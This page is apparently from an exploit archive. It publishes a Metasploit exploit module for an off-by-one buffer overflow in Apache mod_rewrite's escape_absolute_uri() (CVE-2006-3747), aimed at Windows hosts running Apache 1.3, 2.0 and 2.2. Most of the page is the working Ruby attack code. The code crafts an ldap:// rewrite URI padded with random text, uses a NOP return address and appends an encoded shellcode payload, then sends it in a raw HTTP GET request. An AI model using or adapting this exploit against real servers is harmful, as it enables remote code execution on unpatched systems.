apache-mod-rewrite.rb.txt

apache-mod-rewrite.rb.txt: Posted Jan 7, 2008; Authored by Marcin Kozlowski; Apache mod_rewrite escape_absolute_uri() off-by-one buffer overflow Metasploit exploit module. This affects Apache versions 1.3.28 through 1.3.36, 2.0.46 through 2.0.58, and 2.2.1 through 2.2.2.; tags | exploit, overflow; advisories | CVE-2006-3747; SHA-256 | 503139768b0cda278959c2bc8df18f7cb0aee2077db8a28468990531d48c3000; Download | Favorite | View

apache-mod-rewrite.rb.txt

require 'msf/core'

module Msf

class Exploits::Windows::Http::Apache_mod_rewrite < Msf::Exploit::Remote

  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,  
      'Name'           => 'Apache Mod_Rewrite escape_absolute_uri() Off-By-One Buffer Overflow',
      'Description'    => %q{
        This module exploits a off-by-one buffer overflow. RewriteRule must be enabled and rule must meets this criteria:
        *  beginning of the rewritten URL is controlled.
        *  flags on the rule do not include the Forbidden (F), Gone (G), or NoEscape (NE) flag
      },
      'Author'         => [ 'Marcin Kozlowski' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 0001 $',
      'References'     =>
        [
          ['CVE', '2006-3747'],
          ['BID', '19204'],
          ['OSVDB', '27588'],

        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'BadChars'    => "\x00",
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'Targets'        => 
        [
            ['Apache 1.3 branch (>1.3.28 and <1.3.37), Apache 2.0 branch (2.0.46 and <2.0.59), Apache 2.2 branch (>2.2.0 and <2.2.3)', {'Ret' => 0x90909090 }], # our ret is NOP, since our shellcode is shortly after and will be execute next 
        ],
      'DisclosureDate' => 'Aug 28 2006'))
      
      register_options(
        [
          OptString.new('REWRITEPATH', [true, "Rewrite path"]),
          Opt::RPORT(80) 
        ], self.class )
  end

  def exploit
    connect

    rewritepath = datastore['REWRITEPATH']


    uri = "/#{rewritepath}/ldap://"+rand_text_alphanumeric(rand(16))+"/"+rand_text_alphanumeric(rand(32))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(16))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f%90"  
    uri += payload.encoded
    
    
    res = "GET #{uri} HTTP/1.0\r\n\r\n"
    print_status("Trying ...")
    sock.put(res)
    sock.close
    
    handler
    disconnect
  end



end
end

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

apache-mod-rewrite.rb.txt

apache-mod-rewrite.rb.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

apache-mod-rewrite.rb.txt

Share This

apache-mod-rewrite.rb.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems